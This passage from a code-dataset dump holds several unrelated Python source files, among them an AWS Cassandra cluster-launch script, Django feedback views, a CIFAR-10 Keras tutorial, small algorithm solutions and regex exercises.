\"-keystore\", keystore,\n \"-dname\", \"c=DE, st=Berlin, l=Berlin, o=Zalando SE, cn=zalando.net\",\n \"-storepass\", cluster_name,\n \"-keypass\", cluster_name]\n check_call(cmd)\n cert = os.path.join(d, 'cert')\n export = [\"keytool\", \"-export\",\n \"-alias\", \"planb\",\n \"-keystore\", keystore,\n \"-rfc\",\n \"-file\", cert,\n \"-storepass\", cluster_name]\n check_call(export)\n truststore = os.path.join(d, 'truststore')\n importcmd = [\"keytool\", \"-import\",\n \"-noprompt\",\n \"-alias\", \"planb\",\n \"-file\", cert,\n \"-keystore\", truststore,\n \"-storepass\", cluster_name]\n check_call(importcmd)\n\n with open(keystore, 'rb') as fd:\n keystore_data = fd.read()\n with open(truststore, 'rb') as fd:\n truststore_data = fd.read()\n finally:\n pass\n return keystore_data, truststore_data\n\n\ndef allocate_public_ips(regions: list, cluster_size: int, public_ips: dict):\n # reservice Elastic IPs\n for region in regions:\n with Action('Allocating Public IPs for {}..'.format(region)) as act:\n ec2 = boto3.client('ec2', region_name=region)\n for i in range(cluster_size):\n resp = ec2.allocate_address(Domain='vpc')\n public_ips[region].append(resp)\n act.progress()\n\n\ndef get_dmz_subnets(regions: list) -> dict:\n '''\n Returns a dict of lists of DMZ subnets sorted by AZ.\n '''\n subnets = collections.defaultdict(list)\n for region in regions:\n ec2 = boto3.client('ec2', region)\n resp = ec2.describe_subnets()\n\n for subnet in sorted(resp['Subnets'], key=lambda subnet: subnet['AvailabilityZone']):\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n if tag['Value'].startswith('dmz-'):\n subnets[region].append(subnet['SubnetId'])\n return subnets\n\n\n@click.command()\n@click.option('--cluster-size', default=3, type=int, help='number of nodes per region, default: 3')\n@click.option('--instance-type', default='t2.micro', help='default: t2.micro')\n@click.option('--volume-type', default='gp2', help='gp2 (default) | io1 | standard')\n@click.option('--volume-size', default=8, type=int, help='in GB, default: 8')\n@click.option('--volume-iops', default=100, type=int, help='for type io1, default: 100')\n@click.option('--no-termination-protection', is_flag=True, default=False)\n@click.option('--scalyr-key')\n@click.argument('cluster_name')\n@click.argument('regions', nargs=-1)\ndef cli(cluster_name: str, regions: list, cluster_size: 
int, instance_type: str,\n volume_type: str, volume_size: int, volume_iops: int,\n no_termination_protection: bool, scalyr_key: str):\n if not regions:\n raise click.UsageError('Please specify at least one region')\n\n # generate keystore/truststore\n keystore, truststore = generate_certificate(cluster_name)\n\n # Elastic IPs by region\n public_ips = collections.defaultdict(list)\n security_groups = {}\n try:\n allocate_public_ips(regions, cluster_size, public_ips)\n\n # We should have up to 3 seeds nodes per DC\n seed_count = min(cluster_size, 3)\n\n # take first {seed_count} IPs in every region for the seed nodes\n seed_nodes = {}\n for region, ips in public_ips.items():\n seed_nodes[region] = ips[0:seed_count]\n list_ips = [ip['PublicIp'] for ip in seed_nodes[region]]\n info('Our seed nodes in {} are: {}'.format(region, ', '.join(list_ips)))\n\n # Set up Security Groups\n setup_security_groups(cluster_name, public_ips, security_groups)\n\n taupage_amis = find_taupage_amis(regions)\n\n def generate_taupage_user_data() -> str:\n '''\n Generate Taupage user data to start a Cassandra node\n http://docs.stups.io/en/latest/components/taupage.html\n '''\n keystore_base64 = base64.b64encode(keystore)\n truststore_base64 = base64.b64encode(truststore)\n\n # version = get_latest_docker_image_version()\n # registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-no-cass-tools-jamm-0-2-5\n # registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-no-cass-tools\n # registry-write.opensource.zalan.do/reco/planb-cassandra:2.0.17-build-1\n\n all_seeds = [ip['PublicIp'] for region, ips in seed_nodes.items() for ip in ips]\n data = {'runtime': 'Docker',\n 'source': 'registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-build-1',\n 'application_id': cluster_name,\n 'application_version': '1.0',\n 'networking': 'host',\n 'ports': {'7001': '7001',\n '9042': '9042'},\n 'environment': {\n 'CLUSTER_NAME': cluster_name,\n 'CLUSTER_SIZE': cluster_size,\n 'REGIONS': ' '.join(regions),\n 'SEEDS': ','.join(all_seeds),\n 'KEYSTORE': keystore_base64,\n 'TRUSTSTORE': truststore_base64,\n 'ADMIN_PASSWORD': generate_password()\n },\n 'mounts': {\n '/var/lib/cassandra': {\n 'erase_on_boot': True,\n 'partition': '/dev/xvdf',\n 'options': 'noatime,nodiratime'\n }\n },\n 'scalyr_account_key': scalyr_key\n }\n # TODO: add KMS-encrypted keystore/truststore\n\n return data\n\n user_data = generate_taupage_user_data()\n print(user_data)\n taupage_user_data = '#taupage-ami-config\\n{}'.format(yaml.safe_dump(user_data))\n\n # Launch EC2 instances with correct user data\n subnets = get_dmz_subnets(regions)\n\n def launch_instance(region: str, ip: dict, ami: object, subnet_id: str,\n security_group_id: str, node_type: str):\n\n with Action('Launching {} node {} in {}..'.format(node_type, ip['PublicIp'], region)) as act:\n ec2 = boto3.client('ec2', region_name=region)\n\n #\n # Override any ephemeral volumes with NoDevice mapping,\n # otherwise auto-recovery alarm cannot be actually enabled.\n #\n block_devices = []\n for bd in ami.block_device_mappings:\n if 'Ebs' in bd:\n #\n # This has to be our root EBS.\n #\n # If the Encrypted flag is present, we have to delete\n # it even if it matches the actual snapshot setting,\n # otherwise amazon will complain rather loudly.\n #\n # Take a deep copy before deleting the key:\n #\n bd = copy.deepcopy(bd)\n\n root_ebs = bd['Ebs']\n if 'Encrypted' in root_ebs:\n del(root_ebs['Encrypted'])\n\n block_devices.append(bd)\n else:\n # ignore any ephemeral volumes (aka. 
instance storage)\n block_devices.append({'DeviceName': bd['DeviceName'],\n 'NoDevice': ''})\n\n # make sure our data EBS volume is persisted and encrypted\n data_ebs = {'VolumeType': volume_type,\n 'VolumeSize': volume_size,\n 'DeleteOnTermination': False,\n 'Encrypted': True}\n if volume_type == 'io1':\n data_ebs['Iops'] = volume_iops\n\n #\n # Now add the data EBS with pre-defined device name (it is\n # referred to in Taupage user data).\n #\n block_devices.append({'DeviceName': '/dev/xvdf', 'Ebs': data_ebs})\n\n resp = ec2.run_instances(ImageId=ami.id,\n MinCount=1,\n MaxCount=1,\n SecurityGroupIds=[security_group_id],\n UserData=taupage_user_data,\n InstanceType=instance_type,\n SubnetId=subnet_id,\n BlockDeviceMappings=block_devices,\n DisableApiTermination=not(no_termination_protection))\n\n instance = resp['Instances'][0]\n instance_id = instance['InstanceId']\n\n ec2.create_tags(Resources=[instance_id],\n Tags=[{'Key': 'Name', 'Value': cluster_name}])\n\n # wait for instance to initialize before we can assign an IP address to it\n while True:\n resp = ec2.describe_instances(InstanceIds=[instance_id])\n instance = resp['Reservations'][0]['Instances'][0]\n if instance['State']['Name'] != 'pending':\n break\n time.sleep(5)\n act.progress()\n\n ec2.associate_address(InstanceId=instance_id,\n AllocationId=ip['AllocationId'])\n\n # tag the attached data EBS volume for easier cleanup when testing\n for bd in instance['BlockDeviceMappings']:\n if bd['DeviceName'] == '/dev/xvdf':\n ec2.create_tags(Resources=[bd['Ebs']['VolumeId']],\n Tags=[{'Key': 'Name', 'Value': cluster_name}])\n\n # add an auto-recovery alarm for this instance\n cw = boto3.client('cloudwatch', region_name=region)\n cw.put_metric_alarm(AlarmName='{}-{}-auto-recover'.format(cluster_name, instance_id),\n AlarmActions=['arn:aws:automate:{}:ec2:recover'.format(region)],\n MetricName='StatusCheckFailed_System',\n Namespace='AWS/EC2',\n Statistic='Minimum',\n Dimensions=[{\n 'Name': 'InstanceId',\n 'Value': instance_id\n }],\n Period=60, # 1 minute\n EvaluationPeriods=2,\n Threshold=0,\n ComparisonOperator='GreaterThanThreshold')\n\n # Launch sequence:\n # start all the seed nodes\n total_seed_count = seed_count * len(regions)\n seeds_launched = 0\n for region, ips in seed_nodes.items():\n region_subnets = subnets[region]\n for i, ip in enumerate(ips):\n launch_instance(region, ip,\n ami=taupage_amis[region],\n subnet_id=region_subnets[i % len(region_subnets)],\n security_group_id=security_groups[region]['GroupId'],\n node_type='SEED')\n seeds_launched += 1\n if seeds_launched < total_seed_count:\n info(\"Sleeping for half a minute before launching next SEED node..\")\n time.sleep(30)\n\n # TODO: make sure all seed nodes are up\n\n # add remaining nodes one by one\n # TODO: parallelize by region?\n for region, ips in public_ips.items():\n region_subnets = subnets[region]\n for i, ip in enumerate(ips):\n if i >= seed_count:\n # avoid stating all nodes at the same time\n info(\"Sleeping for half a minute before launching next node..\")\n time.sleep(30)\n launch_instance(region, ip,\n ami=taupage_amis[region],\n subnet_id=region_subnets[i % len(region_subnets)],\n security_group_id=security_groups[region]['GroupId'],\n node_type='NORMAL')\n\n info('Cluster initialization completed successfully!')\n sys.stdout.write('''\nThe Cassandra cluster {cluster_name} was created with {cluster_size} nodes\nin each of the following AWS regions: {regions}\n\nYou can now login to any of the cluster nodes with the superuser\naccount using the 
following command:\n\n $ cqlsh -u cassandra -p '{admin_password}'\n\nFrom there you can create non-superuser roles and otherwise configure\nthe cluster.\n\nYou might also need to update the Security Groups named {cluster_name}\n(in all regions!) to allow access to Cassandra from your application (port 9042)\nand optionally to allow access to Jolokia (port 8778) and/or\nPrometheus Node Exporter (port 9100) from your monitoring tool.\n'''.format(cluster_size=cluster_size, cluster_name=cluster_name, regions=' '.join(regions),\n admin_password=user_data['environment']['ADMIN_PASSWORD']))\n\n except:\n for region, sg in security_groups.items():\n ec2 = boto3.client('ec2', region)\n info('Cleaning up security group: {}'.format(sg['GroupId']))\n ec2.delete_security_group(GroupId=sg['GroupId'])\n\n for region, ips in public_ips.items():\n ec2 = boto3.client('ec2', region)\n for ip in ips:\n info('Releasing IP address: {}'.format(ip['PublicIp']))\n ec2.release_address(AllocationId=ip['AllocationId'])\n\n raise\n\nif __name__ == '__main__':\n cli()\n","sub_path":"create-cluster.py","file_name":"create-cluster.py","file_ext":"py","file_size_in_byte":18487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518524833","text":"from bs4 import BeautifulSoup\nfrom sklearn.feature_extraction import DictVectorizer\n\nfrom collections import defaultdict\nfrom charmeleon import Charmeleon\n\nclass HTMLVectorizer():\n\n v = DictVectorizer(sparse=False)\n\n def html_iter(self, files):\n # Build Y = [labels], X = feature matrix\n Y = list()\n X = list()\n\n # Calculate character features for each text node\n charm = Charmeleon()\n\n for f in files:\n soup = BeautifulSoup(open(f))\n\n # Find all text nodes\n text_nodes = soup.find_all(text=True)\n\n # Iterate through text nodes and find annotation labels or label \"None\"\n for text in text_nodes:\n if text.parent is not None:\n node = text.parent\n\n if node.has_attr('annotation'):\n Y.append(node['annotation'])\n else:\n Y.append(\"None\")\n\n features = charm.compute_features(text)\n features['tag_name'] = node.name\n\n X.append(features)\n\n # Return list of character feature vectors + labels\n return [X, Y]\n\n def fit(self, files):\n result = self.html_iter(files)\n X = self.v.fit(result[0])\n Y = result[1]\n return [X,Y]\n\n def fit_transform(self, files):\n result = self.html_iter(files)\n X = self.v.fit_transform(result[0])\n Y = result[1]\n return [X, Y]\n\n def inverse_transform(self, X):\n return self.v.inverse_transform(X)\n\n def transform(self, files):\n result = html_iter(files)\n X = self.v.transform(result[0])\n Y = result[1]\n return [X, Y]","sub_path":"feature-extraction/article_extractor/htmlvectorizer.py","file_name":"htmlvectorizer.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239279265","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom apps.zedutils.forms import FeedbackForm\nfrom apps.zedutils.models import Feedback\nfrom apps.zedutils.utils import get_client_ip\n\ndef feedback(request):\n _dict = {}\n form = FeedbackForm(prefix='feedback')\n _dict['form'] = form\n if request.method == \"POST\" and request.is_ajax():\n try:\n f = Feedback()\n f.message = 
request.POST.get('msg')\n            if request.user.is_authenticated():\n                f.user = request.user\n                f.email = request.user.email\n            else:\n                if len(request.POST.get('email')) > 0:\n                    f.email = request.POST.get('email')\n            f.ip = get_client_ip(request)\n            f.save()\n            return HttpResponse(\"SUCCESS\")\n        except :\n            return HttpResponse(\"ERROR\")\n    return render_to_response('feedback_form.html', _dict, context_instance=RequestContext(request))\n\n@login_required\ndef feedback_list(request):\n    if not request.user.is_superuser:\n        return HttpResponseRedirect(reverse('home'))\n    _dict = {}\n    feedback = Feedback.objects.filter(deleted=False)\n    _dict['feedback'] = feedback\n\n    return render_to_response('feedback_list.html', _dict, context_instance=RequestContext(request))\n\n@login_required\ndef toggle_feedback_read(request):\n    if request.method == \"POST\" and request.is_ajax():\n        try:\n            feedback = Feedback.objects.get(pk=request.POST.get('id'))\n            val = request.POST.get('val')\n            if val == 'no':\n                feedback.read = True\n            elif val == 'yes':\n                feedback.read = False\n            feedback.save()\n            return HttpResponse(\"SUCCESS\")\n        except :\n            return HttpResponse(\"ERROR\")","sub_path":"apps/zedutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"270248039","text":"# -*- coding:utf-8 -*-\n# vim:sw=4 ts=4 si et\n\nfrom django.db.models import Count\nfrom salmon.accounts.models import User\nfrom salmon.server.models import Cluster\nfrom salmon.package.models import Package\nfrom salmon.mastersite.common import get_secondday\n\nfrom models import Content\n# Create your views here.\n\n\ndef get_config_content_data(vd, is_online=False,\n                            selectpro=None,\n                            confname=None,\n                            cluster=None,\n                            server=None,\n                            publisher=None,\n                            publishdate=None,\n                            owner=None,\n                            creationdate=None,\n                            description=None):\n    content_filters = {'name__icontains': confname}\n\n    if owner:\n        related_users = User.objects.filter(username__icontains=owner)\n        if related_users:\n            content_filters['owner__in'] = related_users\n        else:\n            return []\n    if creationdate:\n        content_filters['creationdate__range'] = (creationdate, creationdate + 1)\n\n    package_filters = {}\n    if cluster:\n        related_clusters = Cluster.objects.filter(name__icontains=cluster)\n        if related_clusters:\n            package_filters['slots__server__cluster__in'] = related_clusters\n        else:\n            return []\n    if publisher:\n        related_users = User.objects.filter(username__icontains=publisher)\n        if related_users:\n            package_filters['slots__owner__in'] = related_users\n        else:\n            return []\n    if publishdate:\n        package_filters['deployment_tasks__creationdate__range'] = (publishdate, get_secondday(publishdate))\n\n    if package_filters:\n        related_packages = Package.objects.filter(**package_filters)\n        if related_packages:\n            content_filters['packages__in'] = related_packages\n        else:\n            return []\n    elif is_online and selectpro != u\"全部\":\n        content_filters['online_count__gt'] = 0\n\n    content_set = Content.objects.annotate(online_count=Count(\"packages__slots\"))\n    if content_filters:\n        content_set = content_set.filter(**content_filters)\n    else:\n        content_set = Content.objects.all()\n    content_set = content_set.annotate(deployment_count=Count(\"packages__slots\"))\n\n    return content_set\n","sub_path":"salmon/config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"125515167","text":"# coding: utf-8\n# 
@author: Ross\n# @file: loader.py\n# @time: 2020/01/13\n# @contact: devross@gmail.com\n\nfrom torch.utils.data import Dataset\nimport torch\nimport numpy as np\n\n\nclass PosOOSDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = np.array(dataset)\n\n def __getitem__(self, index: int):\n token_ids, mask_ids, type_ids, label_ids, pos1, pos2, pos_mask= self.dataset[index]\n return (torch.tensor(token_ids, dtype=torch.long),\n torch.tensor(mask_ids, dtype=torch.long),\n torch.tensor(type_ids, dtype=torch.long),\n torch.tensor(pos1),\n torch.tensor(pos2, dtype=torch.long),\n torch.tensor(pos_mask),\n torch.tensor(label_ids, dtype=torch.float32),\n )\n\n def __len__(self) -> int:\n return len(self.dataset)\n","sub_path":"data_utils/pos_tagging_dataset.py","file_name":"pos_tagging_dataset.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"467243953","text":"#!/usr/bin/env python\n\"\"\"\nExports a table as a CSV\n\nUsage:\n ./util/export_csv.py [options]\n\nOptions:\n -h --help Show this text.\n --url URL string to connect to CockroachDB\n --table Name of the table to export\n\"\"\"\n\nfrom docopt import docopt\nfrom connect_with_sqlalchemy import build_engine, build_sqla_connection_string\n\n\ndef get_table(engine, table):\n return engine.execute(\"SELECT * FROM {}\".format(table))\n\n\ndef get_vehicles(engine):\n return engine.execute(\"SELECT * FROM vehicles\")\n\n\ndef print_header(columns):\n header_row = ['\"{}\"'.format(c) for c in columns]\n print(','.join(header_row))\n\n\ndef print_vehicles_row(row):\n row_arr = ['\"{}\"'.format(c) for c in row]\n row_arr[1] = row_arr[1].strip('\"')\n row_arr[2] = row_arr[2].strip('\"')\n row_arr[3] = row_arr[3].strip('\"')\n row_arr[3] = row_arr[3].replace(\"'\", '\"')\n row_arr[3] = \"'{}'\".format(row_arr[3])\n print(\"|\".join(row_arr))\n\n\ndef print_row(row):\n row_arr = ['\"{}\"'.format(c) for c in row]\n print(\"|\".join(row_arr))\n\n\ndef main():\n opts = docopt(__doc__)\n sqla_connection_string = build_sqla_connection_string(opts['--url'])\n engine = build_engine(sqla_connection_string)\n table_name = opts['--table']\n table = get_table(engine, table_name)\n columns = table.keys()\n # print_header(columns)\n if table_name == 'vehicles':\n for row in table:\n print_vehicles_row(row)\n else:\n for row in table:\n print_row(row)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab_complete/movr_py_complete/util/export_csv.py","file_name":"export_csv.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559637976","text":"# Copyright 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom numba.core import types\n\n\ndef numba_type_to_dpctl_typenum(context, type):\n \"\"\"\n This function looks up the dpctl defined enum values from\n ``DPCTLKernelArgType``.\n \"\"\"\n\n val = None\n if type == types.int32 or 
isinstance(type, types.scalars.IntegerLiteral):\n # DPCTL_LONG_LONG\n val = context.get_constant(types.int32, 9)\n elif type == types.uint32:\n # DPCTL_UNSIGNED_LONG_LONG\n val = context.get_constant(types.int32, 10)\n elif type == types.boolean:\n # DPCTL_UNSIGNED_INT\n val = context.get_constant(types.int32, 5)\n elif type == types.int64:\n # DPCTL_LONG_LONG\n val = context.get_constant(types.int32, 9)\n elif type == types.uint64:\n # DPCTL_SIZE_T\n val = context.get_constant(types.int32, 11)\n elif type == types.float32:\n # DPCTL_FLOAT\n val = context.get_constant(types.int32, 12)\n elif type == types.float64:\n # DPCTL_DOUBLE\n val = context.get_constant(types.int32, 13)\n elif type == types.voidptr:\n # DPCTL_VOID_PTR\n val = context.get_constant(types.int32, 15)\n else:\n raise NotImplementedError\n\n return val\n","sub_path":"numba_dppy/driver/_helpers.py","file_name":"_helpers.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561723922","text":"import time\nstart_time = time.time()\n\n# names_1 = BinarySearchTree('M')\n# names_2 = BinarySearchTree('M')\n\n\nnames_dict = {}\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # O(n) operation to store names in dictionary , List containing 10000 names\nfor name in names_1:\n names_dict[name] = name\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # O(n) operation to store names in list List containing 10000 names\nf.close()\n\nduplicates = []\nfor name in names_2: #O(n) operation to loop through all names in list\n if name in names_dict: #O(1) operation to check if exists in dict\n duplicates.append(name)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6661418","text":"import os\r\nimport sys\r\n\r\n\r\nscript = __file__\r\nscript_path = os.path.dirname(script)\r\nscript_file = os.path.basename(script)[0]\r\nfiles = [f for f in os.listdir(script_path) if script_file in f and '.in' in f]\r\nif '{}-large'.format(script_file) in str(files):\r\n size = 'large'\r\nelif '{}-small'.format(script_file) in str(files):\r\n size = 'small'\r\nelif '{}-test'.format(script_file) in str(files):\r\n size = 'test'\r\nelse:\r\n print('{}-test not found'.format(script_file))\r\n sys.exit()\r\nlatest = sorted(f for f in files if size in f)[-1][:-3]\r\nf = '{}/{}'.format(script_path, latest)\r\ni = open(f + '.in', 'r')\r\no = open(f + '.out', 'w')\r\nprint(f)\r\nT = int(i.readline())\r\n\r\n# https://code.google.com/codejam/contest/6254486/dashboard#s=p2\r\n# Problem C. 
Coin Jam\r\n\r\nfrom itertools import *\r\nimport numpy\r\n\r\n\r\ndef primesfrom2to(n):\r\n    sieve = numpy.ones(n // 3 + (n % 6 == 2), dtype=numpy.bool)\r\n    sieve[0] = False\r\n    for i in range(int(n ** 0.5) // 3 + 1):\r\n        if sieve[i]:\r\n            k = 3 * i + 1 | 1\r\n            sieve[(k * k) // 3::2 * k] = False\r\n            sieve[(k * k + 4 * k - 2 * k * (i & 1)) // 3::2 * k] = False\r\n    return numpy.r_[2, 3, (3 * numpy.nonzero(sieve)[0] + 1) | 1]\r\n\r\n\r\nprimes = primesfrom2to(100)\r\n\r\nfor x in range(T):\r\n    o.write('Case #{}:'.format(x + 1))\r\n    N, J = map(int, i.readline().split())\r\n    for j in product('01', repeat=int(N) - 2):\r\n        y = '1{}1'.format(''.join(j))\r\n        divs = []\r\n        for base in range(2, 11):\r\n            for d in primes:\r\n                if not int(y, base) % d:\r\n                    divs.append(str(d))\r\n                    break\r\n            else:\r\n                break\r\n        else:\r\n            J -= 1\r\n            o.write('\\n{} {}'.format(y, ' '.join(divs)))\r\n            if J == 0:\r\n                break\r\n\r\ni.close()\r\no.close()\r\n","sub_path":"Google-Code-Jam/2016-Q/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"189207999","text":"#Time Complexity:O(m*n),m = length of the coins array,n = amount\n#Space Complexity:O(n)\n#Ran successfully on Leetcode:Yes\n#Difficulties faced: Understanding dynamic programming\n\n#dp[i] will be storing the minimum number of coins \n# needed for value i. We need n+1 entries as the table is constructed \n# in bottom up manner using the base case (n = 0) \n# Initialize all dp values as 0.\n\n\nclass Solution:\n    def coinChange(self, coins: List[int], amount: int) -> int:\n        dp = [0]*(amount+1)\n        if not amount:\n            return 0\n        # Pick all coins one by one and update the dp[] values \n        # after the index greater than or equal to the value of the \n        # picked coin \n        for i in range( amount+1):\n            if i in coins:\n                dp[i] = 1#Base case (If given value is 0) \n                continue\n            min_coins = float(\"inf\")\n            for coin in coins:\n                if i-coin >= 0:\n                    min_coins = min(dp[i-coin], min_coins)\n            dp[i] = min_coins+1\n        if dp[-1] == float(\"inf\"):\n            return -1\n        return dp[-1]\n        \n","sub_path":"coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"652836847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 17:53:41 2021\n\n@author: 알파제로를 분석하며 배우는 인공지능\n\"\"\"\n\n#%%\n\n# 3-3-4 Import packages\n\n# Import packages\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.layers import Activation, Dense, Dropout, Conv2D, Flatten, MaxPool2D\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Prepare the dataset\n(train_images, train_labels) , (test_images, test_labels) = cifar10.load_data()\n\n# Check the dataset shapes\nprint(train_images.shape)\nprint(train_labels.shape)\nprint(test_images.shape)\nprint(test_labels.shape)\n\n# Check the dataset images\nfor i in range(10):\n    plt.subplot(2,5,i+1)\n    plt.imshow(train_images[i])\nplt.show()\n\n# Check the dataset labels\nprint(train_labels[0:10])\n\n\n#%%\n\n# 3-3-6 Preprocess and check the dataset\n\n# Preprocess the dataset images\ntrain_images = train_images.astype('float32') / 255.0\ntest_images = test_images.astype('float32') / 255.0\n\n# Check the image shapes after preprocessing\nprint(train_images.shape)\nprint(test_images.shape)\n\n# Preprocess the dataset labels\ntrain_labels = to_categorical(train_labels,10)\ntest_labels = to_categorical(test_labels,10)\n\n# Check the label shapes after preprocessing\nprint(train_labels.shape)\nprint(test_labels.shape)\n\n#%%\n\n# 3-3-7 Create the model\n\n# Create the model\nmodel = Sequential()\nmodel.add(Conv2D(32, (3,3), activation='relu', padding='same', input_shape=(32,32,3)))\nmodel.add(Conv2D(32, (3,3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size = (2,2)))\nmodel.add(Dropout(0.25))\n\n# Conv->Conv -> Pool -> Dropout\nmodel.add(Conv2D(64,(3,3), activation='relu', padding='same'))\nmodel.add(Conv2D(64,(3,3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2,2)))\n\n# Flatten->Dense->Dropout->Dense\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\n# 3-3-8 Compile\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.001), metrics=['acc'])\n\n# 3-3-9 Train\n# Train\nhistory = model.fit(train_images, train_labels, batch_size = 500, epochs=30, validation_split=0.1)\n\n#%%\n\n# 3-3-10 Save and load the model\n\nmodel.save('3-3-convolution.h5')\n\n# Plot the graph\nplt.plot(history.history['acc'],label='acc')\nplt.plot(history.history['val_acc'], label='val_acc')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(loc='best')\nplt.show()\n\n#%%\n\n# 3-3-12 Evaluate\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('loss: {:.3f}\\nacc: {:.3f}'.format(test_loss, test_acc))\n\n# 3-3-13 Inference\n# Show the images to run inference on\n\nfor i in range(10):\n    plt.subplot(2,5,i+1)\n    plt.imshow(test_images[i])\nplt.show()\n\n# Show the predicted labels\nimport random \nn = random.sample(range(1,10001),10)\ntest_predictions = model.predict(test_images[n])\ntest_predictions = np.argmax(test_predictions, axis=1)\nlabels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\nprint([labels[n] for n in test_predictions])\ntemp = np.argmax(test_labels[n],axis=1)\nprint([labels[n] for n in temp])\n\n","sub_path":"AlphaZero_book/chap3/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"496323707","text":"\nimport re\nfrom uuid import UUID\n\ndef getUrlParts(url):\n    expr = r\"//(?P<base>(\\w|\\-)+\\.(\\w|\\-)+\\.(\\w|\\-)+)/(?P<controller>\\w*)/(?P<action>\\w*)\\?\"\n    matches = re.search(expr, url)\n    base = matches.group(\"base\")\n    control = matches.group(\"controller\")\n    action = matches.group(\"action\")\n    tup = (base, control, action)\n    return tup\n\ndef getQueryParameters(url):\n    lists = re.findall(r\"([\\w\\.\\-]*)=([\\w\\.\\-]*)&*\",url)\n    return lists\n\ndef getSpecial(s, letter):\n    expr = r\"\\b({0}\\w*[^{0}\\W]|[^{0}\\W]\\w*{0})\\b\".format(letter)\n    match = re.findall(expr, s, re.I)\n    return match\n\ndef getRealMAC(s):\n    expr = r\"(((([a-fA-F0-9]{2})(-|:)){5})([a-fA-F0-9]{2}))\"\n    match = re.search(expr, s, re.I)\n    if match:\n        return match.group(0)\n    else:\n        return None\n\n\ndef getRejectedEntries():\n    lists = []\n    with open(\"Employees.txt\", 'r') as file:\n        data = file.readlines()\n    for line in data:\n        expr = r\"^((\\w+\\s\\w+)|(\\w+,\\s\\w+))[,; ]+$\"\n        match = re.search(expr, line)\n        if match:\n            x = match.groups()\n            test = x[0]\n            if ',' in test:\n                expr = r\"\\w+\"\n                m = re.findall(expr, test)\n                fo = \"{0} {1}\".format(m[1], m[0])\n                lists.append(fo)\n            else:\n                lists.append(str(test))\n    return sorted(lists)\n\ndef getEmployeesWithStates():\n    dic={}\n    with open(\"Employees.txt\", 'r') as f:\n        data = f.readlines()\n    for line in data:\n        expr = r\"^(([a-zA-z]+\\s[a-zA-z]+)|([a-zA-z]+,\\s[a-zA-z]+)).*?([a-zA-Z ]+)$\"\n        match = re.search(expr, 
